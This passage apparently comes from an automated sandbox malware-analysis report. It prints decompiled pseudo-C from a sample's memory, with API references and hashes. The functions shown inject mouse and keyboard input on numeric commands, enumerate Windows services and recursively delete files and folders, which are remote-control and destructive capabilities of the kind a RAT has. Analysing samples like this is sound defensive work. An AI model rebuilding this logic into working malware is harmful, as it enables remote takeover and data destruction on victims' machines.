											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x46b7a8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E004428C7()) = _v12;
								 *((intOrPtr*)(E004428BB())) = _v16;
								_t96 = E004428C1();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t168 =  *0x46b740; // 0x0
					_t8 =  &_a4; // 0x44307e
					_t178 =  *_t8;
					if(_t168 == 0) {
						L12:
						E004401F5(_t168);
						_t154 = _t178;
						_t169 = _t154 + 1;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						 *0x46b740 = E0043F98C(_t154 - _t169, _t154 - _t169 + 1);
						_t116 = E004401F5(0);
						_t170 =  *0x46b740; // 0x0
						if(_t170 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t171 = _t158 + 1;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t159 = _t158 - _t171;
							_t119 = E00441916(_t170, _t158 - _t171 + 1, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E0044D309(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E00436769(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E00436769(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E00436769(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t27 =  &_v12; // 0x44307e
									_t125 =  *_t27;
									if(_t124 == 0) {
										 *((char*)( *((intOrPtr*)(_t125 + 4)))) = 0;
										L44:
										 *(E004428C7()) = _v8;
										_t128 = E004428BB();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t129 = E0044D309(_t161,  *((intOrPtr*)(_t125 + 4)), 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t168;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t141 =  *((intOrPtr*)(_t135 + 1));
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t11 =  &_v12; // 0x44307e
								_t137 =  *_t11;
								goto L12;
							}
							goto L82;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L82:
			}

0x00442c8e
0x00442c8e
0x00442c98
0x00442c9d
0x00442ca1
0x00442ca3
0x00442cab
0x00442cb6
0x00442e56
0x00442e58
0x00442e59
0x00442e5a
0x00442e5b
0x00442e5c
0x00442e5d
0x00442e62
0x00442e66
0x00442e68
0x00442e6b
0x00442e72
0x00442e79
0x00442e7d
0x00442e80
0x00442e83
0x00442e88
0x00442e89
0x00442e8b
0x00442fb3
0x00442fb3
0x00442fb4
0x00442fb5
0x00442fb6
0x00442fb7
0x00442fb8
0x00442fbd
0x00442fc0
0x00442fc1
0x00442fc9
0x00442fd0
0x00442fd3
0x00442fe0
0x00442fe7
0x00442fe8
0x00442fe9
0x00442fea
0x00442fef
0x00442ffe
0x00443005
0x0044300d
0x0044300f
0x00443019
0x0044301c
0x00443029
0x0044302c
0x0044302e
0x00443047
0x0044304f
0x00443051
0x00443057
0x0044305c
0x00443053
0x00443053
0x00000000
0x00443053
0x00443030
0x00443030
0x00443031
0x00443031
0x00443031
0x0044305e
0x00443011
0x00443011
0x00443011
0x0044306b
0x0044306d
0x0044306f
0x00443071
0x00443081
0x00443081
0x00443073
0x00443073
0x00443076
0x00000000
0x00443078
0x00443078
0x00443079
0x0044307e
0x00443076
0x00443087
0x00443092
0x0044309d
0x00442e91
0x00442e95
0x00442e9a
0x00442e9b
0x00442e9d
0x00000000
0x00442ea3
0x00442ea7
0x00442eac
0x00442ead
0x00442eaf
0x00000000
0x00442eb5
0x00442ebb
0x00442ec0
0x00442ec6
0x00442ecd
0x00442ed3
0x00442ed6
0x00442edc
0x00442ee3
0x00442ee9
0x00442eed
0x00442ef3
0x00442ef6
0x00442efd
0x00442f02
0x00442f02
0x00442f04
0x00442f04
0x00442f07
0x00442f0e
0x00442f26
0x00442f26
0x00442f29
0x00442f10
0x00442f10
0x00442f15
0x00442f17
0x00000000
0x00442f19
0x00442f1b
0x00442f21
0x00442f21
0x00442f17
0x00442f31
0x00442f45
0x00442f4b
0x00442f4d
0x00442f5b
0x00442f5d
0x00442f4f
0x00442f4f
0x00442f52
0x00000000
0x00442f54
0x00442f56
0x00442f56
0x00442f52
0x00442f72
0x00442f79
0x00442f7b
0x00442f8a
0x00442f8d
0x00442f7d
0x00442f7d
0x00442f80
0x00000000
0x00442f82
0x00442f85
0x00442f85
0x00442f80
0x00442f7b
0x00442f97
0x00442fa1
0x00442fa6
0x00442fab
0x00442fb2
0x00442fb2
0x00442eaf
0x00442e9d
0x00442cce
0x00442cce
0x00442cd4
0x00442cd4
0x00442cd9
0x00442d0f
0x00442d10
0x00442d16
0x00442d18
0x00442d1b
0x00442d1b
0x00442d1d
0x00442d1e
0x00442d2f
0x00442d34
0x00442d39
0x00442d43
0x00000000
0x00442d49
0x00442d49
0x00442d4b
0x00442d4c
0x00442d4f
0x00442d4f
0x00442d51
0x00442d52
0x00442d56
0x00442d5e
0x00442d63
0x00442d68
0x00442d70
0x00442d71
0x00442d77
0x00442d7c
0x00442d81
0x00442d87
0x00442d8c
0x00442d8d
0x00442d90
0x00000000
0x00000000
0x00000000
0x00442d90
0x00442d95
0x00442d96
0x00442d9b
0x00442d9d
0x00442d9d
0x00442da5
0x00442dab
0x00442dae
0x00442dae
0x00442db2
0x00000000
0x00000000
0x00442dbc
0x00442dbc
0x00442dbf
0x00442dc2
0x00442dc4
0x00442dd2
0x00442dd4
0x00442dde
0x00442dde
0x00442de0
0x00442de2
0x00000000
0x00000000
0x00442dd9
0x00442ddb
0x00442ddd
0x00442ddd
0x00000000
0x00442ddd
0x00000000
0x00442ddb
0x00442de4
0x00442de7
0x00442de9
0x00442df4
0x00442df6
0x00442e00
0x00442e00
0x00442e02
0x00442e04
0x00000000
0x00000000
0x00442dfb
0x00442dfd
0x00442dff
0x00442dff
0x00000000
0x00442dff
0x00000000
0x00442dfd
0x00442e00
0x00442de7
0x00442e06
0x00442e06
0x00442e08
0x00442e0c
0x00442e0c
0x00442e11
0x00442e13
0x00442e16
0x00442e19
0x00442e1b
0x00442e1b
0x00442e1e
0x00442e39
0x00442e3c
0x00442e44
0x00442e49
0x00442e4e
0x00000000
0x00442e4e
0x00442e20
0x00442e28
0x00442e2d
0x00442e30
0x00442e32
0x00000000
0x00000000
0x00442e34
0x00442d81
0x00000000
0x00442d68
0x00442cdb
0x00442cdb
0x00442cdd
0x00442cdf
0x00442cdf
0x00442ce3
0x00000000
0x00000000
0x00442ce7
0x00442cfb
0x00442cfb
0x00442ce9
0x00442ce9
0x00442cef
0x00000000
0x00442cf1
0x00442cf1
0x00442cf4
0x00442cf9
0x00000000
0x00000000
0x00000000
0x00000000
0x00442cf9
0x00442cef
0x00442d04
0x00442d06
0x00442e55
0x00442e55
0x00442d0c
0x00442d0c
0x00442d0c
0x00000000
0x00442d0c
0x00000000
0x00442d06
0x00442cff
0x00442d01
0x00442d01
0x00000000
0x00442d01
0x00442cd9
0x00000000

APIs

_free.LIBCMT ref: 00442D10
_free.LIBCMT ref: 00442D34
_free.LIBCMT ref: 00442EBB
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045913C), ref: 00442ECD
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B754,000000FF,00000000,0000003F,00000000,?,?), ref: 00442F45
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B7A8,000000FF,?,0000003F,00000000,?), ref: 00442F72
_free.LIBCMT ref: 00443087

Strings

~0D, xrefs: 00442CD4, 00442D58, 00442D72, 00442D9E, 00442DC5, 00442DEA, 00442E22, 00442E6C
~0D, xrefs: 00442E1B, 00442D0C, 00442D75

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: ~0D$~0D
API String ID: 314583886-1476019045
Opcode ID: ff1d76a52a8688ecceb277c1551a573c3b2025c38d44ba6d272ba75c614cad4f
Instruction ID: 8e12491e8a086c2fb2f0f953e3b521b5a94b3cb87029702874b2c6f79563a918
Opcode Fuzzy Hash: ff1d76a52a8688ecceb277c1551a573c3b2025c38d44ba6d272ba75c614cad4f
Instruction Fuzzy Hash: 48C13B71D00205ABEB10AF69CE40BAABBB8EF45314FA441AFF444D7251E7B88E46C75D

Uniqueness

Uniqueness Score: -1.00%

Function 00414F84, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00414F84(signed int __edx, void* __eflags, char _a8) {
				void* _v28;
				char _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				intOrPtr* _t60;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t72;
				intOrPtr* _t74;
				char* _t79;
				char* _t80;
				char* _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr _t90;
				signed int _t101;
				signed int _t109;
				signed int _t118;
				signed int _t136;

				_t136 = __edx;
				_t90 =  *((intOrPtr*)(E00405220(0)));
				E004042A6( &_a8,  &_v32, 1, 0xffffffff);
				if(_t90 != 0x30) {
					__eflags = _t90 - 0x31;
					if(_t90 != 0x31) {
						__eflags = _t90 - 0x32;
						if(_t90 != 0x32) {
							__eflags = _t90 - 0x33;
							if(_t90 != 0x33) {
								__eflags = _t90 - 0x34;
								if(_t90 != 0x34) {
									__eflags = _t90 - 0x35;
									if(_t90 != 0x35) {
										__eflags = _t90 - 0x36;
										if(_t90 == 0x36) {
											_push(0);
											_push(0x78);
											goto L15;
										}
									} else {
										_push(0);
										_push(0xffffff88);
										L15:
										mouse_event(0x800, 0, 0, ??, ??);
									}
								} else {
									_v40 =  *((intOrPtr*)(E00405220(0)));
									_t60 = E00405220(4);
									_t101 =  *0x46bd74; // 0x0
									_v40 =  *_t60;
									E00414E1E( *((intOrPtr*)(0x46bd78 + _t101 * 4)),  &_v44, __eflags,  &_v40);
									E00415250(_v44, _v40);
								}
							} else {
								_t65 = E00405220(0);
								_v44 =  *((intOrPtr*)(E00405220(4)));
								_t67 = E00405220(8);
								_t109 =  *0x46bd74; // 0x0
								_v44 =  *_t67;
								E00414E1E( *((intOrPtr*)(0x46bd78 + _t109 * 4)),  &_v48, __eflags,  &_v44);
								E004151F4( *_t65, _v48, _v44);
								goto L8;
							}
						} else {
							_t72 = E00405220(0);
							_v40 =  *((intOrPtr*)(E00405220(4)));
							_t74 = E00405220(8);
							_t118 =  *0x46bd74; // 0x0
							_v48 =  *_t74;
							E00414E1E( *((intOrPtr*)(0x46bd78 + _t118 * 4)),  &_v44, __eflags,  &_v48);
							E00415198( *_t72, _v44, _v48);
							goto L8;
						}
					} else {
						_t79 = E00405220(4);
						_t80 = E00405220(3);
						_t81 = E00405220(2);
						_t82 = E00405220(0);
						 *_t79 =  *_t80;
						__eflags =  *_t81;
						E00415288( *_t82, __edx & 0xffffff00 |  *_t81 != 0x00000000, (( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0 |  *_t80 != 0x00000000) & 0x000000ff, ( &_v40 & 0xffffff00 |  *_t79 != 0x00000000) & 0x000000ff);
						goto L8;
					}
				} else {
					E00405220(0);
					_t85 = E00405220(1);
					E0041459C( *_t85, _t136 & 0xffffff00 |  *_t85 != 0x00000000,  *_t85, StrToIntA(E00405220(2)));
					L8:
				}
				E00401FC7();
				return E00401FC7();
			}

0x00414f84
0x00414fa2
0x00414fa9
0x00414fb1
0x00414ff0
0x00414ff3
0x0041504f
0x00415052
0x004150af
0x004150b2
0x00415110
0x00415113
0x00415161
0x00415164
0x0041516b
0x0041516e
0x00415170
0x00415171
0x00000000
0x00415171
0x00415166
0x00415166
0x00415167
0x00415173
0x0041517a
0x0041517a
0x00415115
0x00415127
0x0041512b
0x00415130
0x00415143
0x0041514c
0x0041515a
0x0041515a
0x004150b4
0x004150b9
0x004150cf
0x004150d7
0x004150dc
0x004150ef
0x004150f8
0x00415108
0x00000000
0x00415108
0x00415054
0x00415059
0x0041506f
0x00415077
0x0041507c
0x0041508f
0x00415098
0x004150a8
0x00000000
0x004150a8
0x00414ff5
0x00414ffb
0x00415008
0x00415015
0x00415022
0x0041502d
0x00415037
0x00415044
0x00000000
0x00415049
0x00414fb3
0x00414fb8
0x00414fc5
0x00414fe6
0x0041510d
0x0041510d
0x00415184
0x00415197

APIs

StrToIntA.SHLWAPI(00000000,00000002,00000001,00000000,?,00000001,000000FF,00000000), ref: 00414FD8
mouse_event.USER32 ref: 0041517A

Part of subcall function 00414E1E: GetSystemMetrics.USER32 ref: 00414E53
Part of subcall function 00414E1E: GetSystemMetrics.USER32 ref: 00414E68

Part of subcall function 00415250: SendInput.USER32(00000001,?,0000001C,?,00000000,?,00000001,000000FF,00000000), ref: 0041527C

Strings

1, xrefs: 00414FF0
4, xrefs: 00415110
2, xrefs: 0041504F
5, xrefs: 00415161
6, xrefs: 0041516B
3, xrefs: 004150AF
0, xrefs: 00414FAE

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: MetricsSystem$InputSendmouse_event
String ID: 0$1$2$3$4$5$6
API String ID: 1731092567-2737206560
Opcode ID: 02bf39f7816a9859347e8bfc8ed843a2cf5b6bd291f8f99223f9e26ce8eeecd4
Instruction ID: 98728168b40b8b0f2fa1d2667a03c4bebee108b3f602935a09316417a0552965
Opcode Fuzzy Hash: 02bf39f7816a9859347e8bfc8ed843a2cf5b6bd291f8f99223f9e26ce8eeecd4
Instruction Fuzzy Hash: FB51DF74904701AFC700EF21E856BDB7794EF89310F40096EF592572D1DB38AA48CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 004160DB, Relevance: 15.2, APIs: 10, Instructions: 226
serviceCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004160DB(intOrPtr __ecx) {
				int _v8;
				int _v12;
				int _v16;
				int _v20;
				struct _QUERY_SERVICE_CONFIG* _v24;
				void* _v28;
				intOrPtr _v32;
				short** _v36;
				intOrPtr _v40;
				char _v64;
				char _v88;
				char _v112;
				char _v136;
				struct _ENUM_SERVICE_STATUS _v172;
				void* __ebx;
				void* __edi;
				struct _ENUM_SERVICE_STATUS* _t87;
				void* _t100;
				void* _t107;
				int _t108;
				long _t110;
				void* _t133;
				intOrPtr _t198;
				short** _t199;
				int _t201;
				intOrPtr _t202;
				int _t203;

				_t198 = __ecx;
				_v40 = __ecx;
				_t133 = OpenSCManagerA(0, 0, 4);
				if(_t133 != 0) {
					E00401F6D(_t133,  &_v88);
					_v12 = 0;
					_v8 = 0;
					_v20 = 0;
					__eflags = EnumServicesStatusW(_t133, 0x3b, 3,  &_v172, 0,  &_v12,  &_v8,  &_v20);
					if(__eflags != 0) {
						L12:
						CloseServiceHandle(_t133);
						E0040331A(_t133, _t198, __eflags,  &_v88);
						E00401EF0();
						L13:
						return _t198;
					}
					__eflags = GetLastError() - 0xea;
					if(__eflags != 0) {
						goto L12;
					}
					_t201 = _v12;
					_push(_t201);
					_t87 = E004394F6( &_v88);
					_v36 = _t87;
					EnumServicesStatusW(_t133, 0x3b, 3, _t87, _t201,  &_v12,  &_v8,  &_v20);
					_t202 = 0;
					_v32 = 0;
					__eflags = _v8;
					if(__eflags <= 0) {
						L11:
						L004394F1(_v36);
						goto L12;
					}
					_t199 = _v36;
					do {
						E00403311(E00404405(_t133,  &_v112, _t199[1], __eflags, E0040427F(_t133,  &_v64, 0x4659c4)));
						E00401EF0();
						E00401EF0();
						E00403311(E00404405(_t133,  &_v64,  *_t199, __eflags, E0040427F(_t133,  &_v112, 0x4659c4)));
						E00401EF0();
						E00401EF0();
						_t100 = E0040427F(_t133,  &_v136, 0x4659c4);
						E00403311(E00403030( &_v64, E0041729F(_t133,  &_v112, _t199[3]), _t100));
						E00401EF0();
						E00401EF0();
						E00401EF0();
						_v16 = _v16 & 0x00000000;
						_t107 = OpenServiceW(_t133,  *_t199, 1);
						_v28 = _t107;
						_t108 = QueryServiceConfigW(_t107, _v24, 0,  &_v16);
						__eflags = _t108;
						if(_t108 == 0) {
							_t110 = GetLastError();
							__eflags = _t110 - 0x7a;
							if(_t110 == 0x7a) {
								_t203 = _v16;
								_push(_t203);
								_v24 = E004394F6( &_v16);
								_t204 = _v24;
								QueryServiceConfigW(_v28, _v24, _t203,  &_v16);
								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *_v24), _t199, __eflags, 0x4659c4));
								E00401EF0();
								E00401EF0();
								E00403311(E004030A6(_t133,  &_v136, E0041729F(_t133,  &_v64,  *((intOrPtr*)(_t204 + 4))), _t199, __eflags, 0x4659c4));
								E00401EF0();
								E00401EF0();
								E00403311(E004030A6(_t133,  &_v136, E00404405(_t133,  &_v64,  *((intOrPtr*)(_t204 + 0xc)), __eflags, E0040427F(_t133,  &_v112, 0x4659c4)), _t199, __eflags, "\n"));
								E00401EF0();
								E00401EF0();
								E00401EF0();
								L004394F1(_t204);
								_t202 = _v32;
							}
						}
						CloseServiceHandle(_v28);
						_t202 = _t202 + 1;
						_t199 =  &(_t199[9]);
						_v32 = _t202;
						__eflags = _t202 - _v8;
					} while (__eflags < 0);
					_t198 = _v40;
					goto L11;
				}
				E0040427F(_t133, _t198, 0x45f724);
				goto L13;
			}

0x004160eb
0x004160ef
0x004160f8
0x004160fc
0x00416112
0x0041611a
0x00416121
0x00416128
0x0041613f
0x00416141
0x0041638a
0x0041638b
0x00416397
0x0041639f
0x004163a4
0x004163ac
0x004163ac
0x0041614d
0x00416152
0x00000000
0x00000000
0x00416158
0x0041615b
0x0041615c
0x00416165
0x00416178
0x0041617e
0x00416180
0x00416183
0x00416186
0x00416381
0x00416384
0x00000000
0x00416389
0x0041618c
0x0041618f
0x004161ad
0x004161b5
0x004161bd
0x004161df
0x004161e7
0x004161ef
0x004161ff
0x0041621f
0x00416227
0x0041622f
0x0041623a
0x0041623f
0x00416248
0x00416251
0x0041625b
0x00416261
0x00416263
0x00416269
0x0041626f
0x00416272
0x00416278
0x0041627b
0x00416282
0x0041628a
0x00416291
0x004162b8
0x004162c3
0x004162cb
0x004162f2
0x004162fd
0x00416305
0x0041633b
0x00416346
0x0041634e
0x00416356
0x0041635c
0x00416361
0x00416364
0x00416272
0x00416368
0x0041636e
0x0041636f
0x00416372
0x00416375
0x00416375
0x0041637e
0x00000000
0x0041637e
0x00416105
0x00000000

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,?,0046BACC,0046C998), ref: 004160F2
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,00415BDC,?), ref: 00416139
GetLastError.KERNEL32(?,0046BACC,0046C998), ref: 00416147
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,00415BDC,?), ref: 00416178
OpenServiceW.ADVAPI32(00000000,?,00000001,00000000,004659C4,00000000,004659C4,00000000,004659C4,?,0046BACC,0046C998), ref: 00416248

Memory Dump Source

Source File: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.923593535.000000000046F000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: EnumOpenServicesStatus$ErrorLastManagerService
String ID:
API String ID: 2247270020-0
Opcode ID: c6a92f844cde82fafec512e43e8d978dbcbce82eb2953aa0a7a725d785e2f1d0
Instruction ID: 68473e94775990671fd8c6040cdbc231cd1f0957a3a8cd51887978b0f5e9c903
Opcode Fuzzy Hash: c6a92f844cde82fafec512e43e8d978dbcbce82eb2953aa0a7a725d785e2f1d0
Instruction Fuzzy Hash: 7B814D71D00209AACB14EBA1DC929EEB739EF14345F10406EF916761D2EF386A09CB98

Uniqueness

Uniqueness Score: -1.00%

Function 105A85C2, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E105A85C2(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				signed int _t56;
				intOrPtr _t57;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
				_t103 = __ecx;
				_t118 =  &_v1052 - __ecx;
				do {
					_t52 =  *_t103 & 0x0000ffff;
					 *(_t118 + _t103) = _t52;
					_t103 =  &(_t103[1]);
				} while (_t52 != 0);
				_t89 =  &_v1052 - 2;
				do {
					_t53 =  *((intOrPtr*)(_t89 + 2));
					_t89 = _t89 + 2;
				} while (_t53 != 0);
				 *_t89 =  *0x465914;
				_t106 =  &_v532 - __ecx;
				 *((short*)(_t89 + 4)) =  *0x465918;
				_t90 = __ecx;
				do {
					_t56 =  *_t90 & 0x0000ffff;
					 *(_t106 + _t90) = _t56;
					_t90 =  &(_t90[1]);
				} while (_t56 != 0);
				_t110 =  &_v532 - 2;
				do {
					_t57 =  *((intOrPtr*)(_t110 + 2));
					_t110 = _t110 + 2;
				} while (_t57 != 0);
				 *_t110 =  *0x45f948;
				_t86 = FindFirstFileW( &_v1052,  &_v1644);
				if(_t86 == 0xffffffff) {
					L34:
					return 0;
				}
				_t91 = 0;
				do {
					_t63 =  *(_t123 + _t91 - 0x210) & 0x0000ffff;
					_t91 = _t91 + 2;
					 *(_t123 + _t91 - 0x41a) = _t63;
				} while (_t63 != 0);
				_v5 = 1;
				do {
					if(FindNextFileW(_t86,  &_v1644) == 0) {
						if(GetLastError() != 0x12) {
							L33:
							FindClose(_t86);
							goto L34;
						}
						_t68 = 0;
						_v5 = 0;
						goto L23;
					}
					if(E105A854C( &(_v1644.cFileName)) != 0) {
						L22:
						_t68 = _v5;
						goto L23;
					}
					_t107 =  &(_v1644.cFileName);
					_t120 = _t107;
					do {
						_t72 =  *_t107;
						_t107 = _t107 + 2;
					} while (_t72 != 0);
					_t108 = _t107 - _t120;
					_t112 =  &_v532 - 2;
					do {
						_t73 =  *(_t112 + 2);
						_t112 = _t112 + 2;
					} while (_t73 != 0);
					_t95 = _t108 >> 2;
					memcpy(_t112, _t120, _t95 << 2);
					memcpy(_t120 + _t95 + _t95, _t120, _t108 & 0x00000003);
					_t124 = _t124 + 0x18;
					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
							SetFileAttributesW( &_v532, 0x80);
						}
						if(DeleteFileW( &_v532) == 0) {
							goto L33;
						} else {
							_t100 = 0;
							do {
								_t78 =  *(_t123 + _t100 - 0x418) & 0x0000ffff;
								_t100 = _t100 + 2;
								 *(_t123 + _t100 - 0x212) = _t78;
							} while (_t78 != 0);
							goto L22;
						}
					}
					if(E105A85C2( &_v532) == 0) {
						goto L33;
					}
					RemoveDirectoryW( &_v532);
					_t102 = 0;
					do {
						_t84 =  *(_t123 + _t102 - 0x418) & 0x0000ffff;
						_t102 = _t102 + 2;
						 *(_t123 + _t102 - 0x212) = _t84;
					} while (_t84 != 0);
					goto L22;
					L23:
				} while (_t68 != 0);
				FindClose(_t86);
				return RemoveDirectoryW(_v12);
			}

0x105a85d6
0x105a85d9
0x105a85db
0x105a85dd
0x105a85dd
0x105a85e0
0x105a85e4
0x105a85e7
0x105a85f2
0x105a85f7
0x105a85f7
0x105a85fb
0x105a85fe
0x105a860e
0x105a8610
0x105a8618
0x105a861c
0x105a861e
0x105a861e
0x105a8621
0x105a8625
0x105a8628
0x105a8633
0x105a8638
0x105a8638
0x105a863c
0x105a863f
0x105a8649
0x105a865f
0x105a8664
0x105a87ac
0x00000000
0x105a87ac
0x105a866a
0x105a866c
0x105a866c
0x105a8674
0x105a8677
0x105a867f
0x105a8684
0x105a8688
0x105a8698
0x105a879c
0x105a87a5
0x105a87a6
0x00000000
0x105a87a6
0x105a879e
0x105a87a0
0x00000000
0x105a87a0
0x105a86ab
0x105a872c
0x105a872c
0x00000000
0x105a872c
0x105a86ad
0x105a86b5
0x105a86b7
0x105a86b7
0x105a86ba
0x105a86bd
0x105a86c8
0x105a86ca
0x105a86cd
0x105a86cd
0x105a86d1
0x105a86d4
0x105a86db
0x105a86de
0x105a86ec
0x105a86ec
0x105a86ee
0x105a8750
0x105a875e
0x105a875e
0x105a8773
0x00000000
0x105a8775
0x105a8777
0x105a8779
0x105a8779
0x105a8781
0x105a8784
0x105a878c
0x00000000
0x105a8791
0x105a8773
0x105a86fd
0x00000000
0x00000000
0x105a870a
0x105a8712
0x105a8714
0x105a8714
0x105a871c
0x105a871f
0x105a8727
0x00000000
0x105a872f
0x105a872f
0x105a8738
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,?,0046C238), ref: 105A8659
FindNextFileW.KERNEL32(00000000,?,?,?,0046C238), ref: 105A8690
RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 105A870A
FindClose.KERNEL32(00000000,?,?,0046C238), ref: 105A8738
RemoveDirectoryW.KERNEL32(?,?,?,0046C238), ref: 105A8741
SetFileAttributesW.KERNEL32(?,00000080,?,?,0046C238), ref: 105A875E
DeleteFileW.KERNEL32(?,?,?,0046C238), ref: 105A876B
GetLastError.KERNEL32(?,?,0046C238), ref: 105A8793
FindClose.KERNEL32(00000000,?,?,0046C238), ref: 105A87A6

Memory Dump Source

Source File: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 2d53b322898e3808e9dee1ab89742ccc995be15de5dfc28abab10a672681bbc4
Instruction ID: fe0813357b28ec706514b4bea357bafe9a2899ab05da6043e83b300a5cded870
Opcode Fuzzy Hash: 2d53b322898e3808e9dee1ab89742ccc995be15de5dfc28abab10a672681bbc4
Instruction Fuzzy Hash: B951243450025ACACB14DFA8C8887FEBBB4FF54385F5141E9E80993151FB329E8ACB54

Uniqueness

Uniqueness Score: -1.00%

Function 00417754, Relevance: 13.6, APIs: 9, Instructions: 147
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417754(WCHAR* __ecx) {
				char _v5;
				WCHAR* _v12;
				short _v532;
				short _v1052;
				struct _WIN32_FIND_DATAW _v1644;
				signed int _t52;
				intOrPtr _t53;
				char _t54;
				short _t55;
				signed int _t56;
				intOrPtr _t57;
				char _t58;
				signed int _t63;
				char _t68;
				void _t72;
				void _t73;
				signed int _t78;
				signed int _t84;
				void* _t86;
				intOrPtr* _t89;
				signed short* _t90;
				void* _t91;
				signed int _t95;
				void* _t100;
				void* _t102;
				signed short* _t103;
				void* _t106;
				void* _t107;
				signed int _t108;
				intOrPtr* _t110;
				void* _t112;
				void* _t118;
				void* _t120;
				void* _t123;
				void* _t124;

				_v12 = __ecx;
